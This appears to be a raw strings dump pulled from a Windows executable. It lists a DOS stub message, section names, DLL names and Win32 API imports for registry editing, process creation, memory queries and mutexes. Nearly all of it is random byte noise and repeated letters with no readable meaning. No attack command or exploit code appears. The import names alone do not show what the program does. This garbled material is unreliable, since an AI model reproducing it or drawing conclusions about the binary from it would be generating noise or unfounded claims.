b%F/+9
`@-BGP
BL$` )U
BtXGE!
B@W!Xx6
C/14gz-!
c4B>mH
@C{AP3
CC>>>222JJJ
ccccc((
ccccccc
ccccccccccccccc@@@@@@:::::PP
))cEEEEEEAA
Ch.dll
cH|.`@xQYx
C~KEgo+
cn*l}&
CoTaskMemFree
CreateProcessA
CreateStdAccessibleObject
C+wIG[
`C|WM82
D[8`t%l
@.data
+DB0}(
dddddd
ddddddddddddiiii111
((dddddddddddGGGGGGG
}}}}}}}}}DDDDL
DDDDxPP?
DDDPPPYYYYiii
ddiiiiiiiiiiiiXX{{{
D,[|)h
''''dMMMM
DNNbbb
	+\*D,#t=
|DTbxV
E7a'C{
e8+NRT1
%%/\E);9
e9X(g;41
E_<AHAq
EbCaiW
::::EE
eeeeee
eeeeeee
eeeeeeeee
EEEE+SSSSSS
EEtttttt
[EI*(DQ
Ej~i+a
e!mo,G^
EnumResourceNamesA
'Et*'2
eu]t{v<[Z
<E]vb{
@E[y  `
`!!!!!!f
''''''''f
%%%%f||||||===
+++++f
F0}"})p
F9LZ\*3J
]]]]FF
FFFFFA
?ffL7-`
f_"i8!hj
Fx6G"c
.  )Fy
*` f;Z
 G`323
G*4Amxv
G9GdUV(
 G^]D)
GetSystemTimeAsFileTime
++ggg{1111
%%%%%%GGGG===
	GGGGGG
GGGGGGG
GGGGGGG}}}}
GGGGGGR7
GGGMMMMMr
GGttttttttt```oooooo
g_k, `c
`GRzey
<g|ScQ
&` g;W
gX<r;V@
Gy`$lTP
h[00:|,
 H0	u& 
*h2H>_
HBa1h5
hB!L8R
hhhhhh
HHHHHH
HHHHHoooooooooooo
HHHppp
& `hRk$
$h<tR1LD
`HuLpl
hv$ `}
h;x-4V
IaKPiYOa`
I:b47}
@ I:]E
iii&&&&&&&&6666
iiiiEEEEEEEEEEEE
}IIIIIIIII888
i{N}$``
InterlockedExchange
*<Iug_
IuIF$@
IX'g86
Iy_(15!
	'~J/8YdK
jhV|EJ
jjjj%%%%%%%%%%%%%
jjjjjjjjj
]]]]]]]jjjjjjjjj
))))jjjjjjVVVV
JJJJJW
JJJJPPPP
Jk- `.
,^Jw(es
jZ>Skh
{K[28i
?k8ztf"
k~/B;& 
K|cGw]}n
KERNEL32.dll
kja[/oTW
$$							kkkkjjjjj
kkkkkk
kkkkkkk
KKKKKKKggOOO
kkkkkkkkkk
KKKKKKKKKKKKKKKKKQQQQ
KKKKK>>>ooooooo!!!H
KKUUUhhppSSSSStttttttttt(((((
kmSH8F
,Kq[y=
KsI"` C
KT[-#vZ/H
}Ku{0,  
K@|X/5
(($$$$$$$$$$$$l
L?bJ1jNDX
lCLY7;
LhbV4~
lH(U	>~!
@l(`@JP
lkz0![P
lllllll
LLLLLLLL
lllllllllllllllllY
LocalAlloc
LresultFromObject
lstrlenA
{l	V{~
]LW%JY
)=M>$ `
MMMMMM'''>~
mmmmmmm++
MMMMMMMMMMM
mUE"`@
MultiByteToWideChar
`@MU>Z
(@`m)w
|#n-3%
 @N	5Cji
NBkyv0
nIS^&@
}NL0x1] 
;;;;nn
//nnn11@@@@@oooo6
nnnnnn
%%%NNNNNNNNN
nnnnnnnnnn       
<<<<<<<<<<NNNNNNNNNN
[[[[[nnnnnvvvvrr
nOpS{P-
Nw|17i\&
o~*@`"``
/\#|O^
$'{]O7
-oa%p;v$e
@ %o\E
OLEACC.dll
oLOqGg&
ooo...
OOOOO8888888888
OpenMutexW
O!P?@m
.os\Xt
ovvvvvvvvvvvvvv
///////////P
P* `	$
@@p>2b
p`3Nb[
 ``P4	
pe.@ >
PeIdj%
PPPP0000
pppppp
pppppp***
PPPPPPbbbbbbbbb
PPPPPPPPPPPcccccccc
pppppppppppppppppppp
PPPPPPPPqq
]PQ"i:z
ProgIDFromCLSID
\p%* T
pvSw8/5
qa% ~]
!Q:A+P
	QhmQ!K
				QQ888rrG
QQ,,,d
qqdddddddddddd
qqq88888
QQQQQQ
qqqqqqqq
QQQQQQQQQQ
qqqqqqttttt
}qRx?I
^|?qsA
Qu[^}$
,/QuUUz13
Q,`@'z
QzrEj%
[&@ /@r
+<)R?\
RaiseException
rA{%Ox|
R,@ aw<
R=[C+E
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
rggggggggggg
=rG}hES
..RRRR
rrrrrr
rrrrrrrrr
`	'-{s
=s0lP2
" `s3"
,` `S4R
s%,7fa
S;aB'.P
@saZa6
SHELL32.dll
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
sjF?`F
S]m4zt
~SQKYM
ss~,  
SSSS~~\\
ssssss
SSSSSS
SSSSSSS
SSSSSSSSSS
SSSSSSSSSSSS
SSSSSSSSSSSSS
SSSSSSSSU
StringFromCLSID
StringFromIID
s=Vlae" 
  ^]t!
 T0/TIdML
t0zoCa
t5_m.``
(T5uE+
!This program cannot be run in DOS mode.
tJHypLH
T>JU[j
t>K{[o|
t#nA/q
tNe}ntS
}TN |yiT
@tPY7x
t'.` s
::::::::::::tt
T&TF=S
ttjjj\\\
!!!TTT
tttt88888
tttttt
Tv4+ @
.` U)	
U====================
u6!{zU
UE6C6ET ``
@u-JvM
u @ k9g
UM,jabMD
u& `n5
(u/[Us
//{UUUll
uuuuuu,,,,,,,,
				UUUUUUUPPPP00000000000000
UUUUUUUU
UUUUUUUUUUUU
UUUUUUUUUUUULL
UUUUUUUUUUUUUU
||uuxx
	v{#,{
VAAAAA
		vD$`
VirtualQueryEx
`VM@m>
v+pPo6
VU;}w\
VVVVVV
w/"  .`
` W0)P
W3MIn07
;w`4F'
W6L&X]?
;WBjX+,` c
w.``Hf
WideCharToMultiByte
}}w!?!>k
Woo:zd
w>psvR#
ww%%%%%%\\hjj2U
wwwwjjj
W""""""wwww!!!!!
))))WWWWWWW
//////x
x37Pa"
XA?2rV
XeO^'j
xioQW0
,XJZ9&
X#n$Vk
xP6\	\
 `xpEG
XQ+lJ.">
Xtl_\b
\\\\\\\XX
~~~xxx
XXX<<<<
XXX222mmmmm
xxxxxx
XXXXXXXXf
xYJ*@ 
YE&` o"@
	yF'RT
YFwSBd
@|yg@X2K#|
 `yh2w
Y<HHHHHHHH
YI.........
y?!wUIt
yxr3\xO
YYJJJJJ
YYY,,,,
(((YYYY&&&,^^
yyyyyyyyyy
_Z, `-/
Z4fn;1-}V
^ZDDDDDDD
zDDDDDDD					l
z?#LpE
zNJD{'
@@z;qr
z]QyS3}
ZvvZ[|
zz{JJ[[["""""""""""
>>>>>>zzzmmmmmmmmmmmmmmmmm`<<<~~~~~~~
zzzzAAA
zzzzzzBBBBBBBBBBDDDDS
ZZZZZZZZ++++++++++